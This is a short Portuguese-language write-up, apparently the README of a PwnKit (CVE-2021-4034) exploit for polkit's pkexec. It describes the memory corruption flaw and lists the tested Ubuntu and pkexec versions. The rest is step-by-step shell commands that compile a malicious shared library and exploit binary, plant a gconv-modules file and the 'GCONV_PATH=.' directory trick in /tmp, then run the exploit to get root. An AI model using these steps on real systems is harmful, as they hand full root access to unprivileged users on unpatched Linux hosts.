
PwnKit - Vulnerabilidade de Escalação Local de Privilégios Descoberta no pkexec do polkit (CVE-2021-4034)
A Equipe de Pesquisa Qualys descobriu uma vulnerabilidade de corrupção de memória no pkexec do polkit, um programa SUID-root instalado por padrão em todas as principais distribuições Linux. Essa vulnerabilidade facilmente explorável permite que qualquer usuário sem privilégios obtenha privilégios totais de root em um host vulnerável ao explorar essa vulnerabilidade em sua configuração padrão.
Ubuntu 20.04.3 LTS x86_64
Versão do pkexec 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit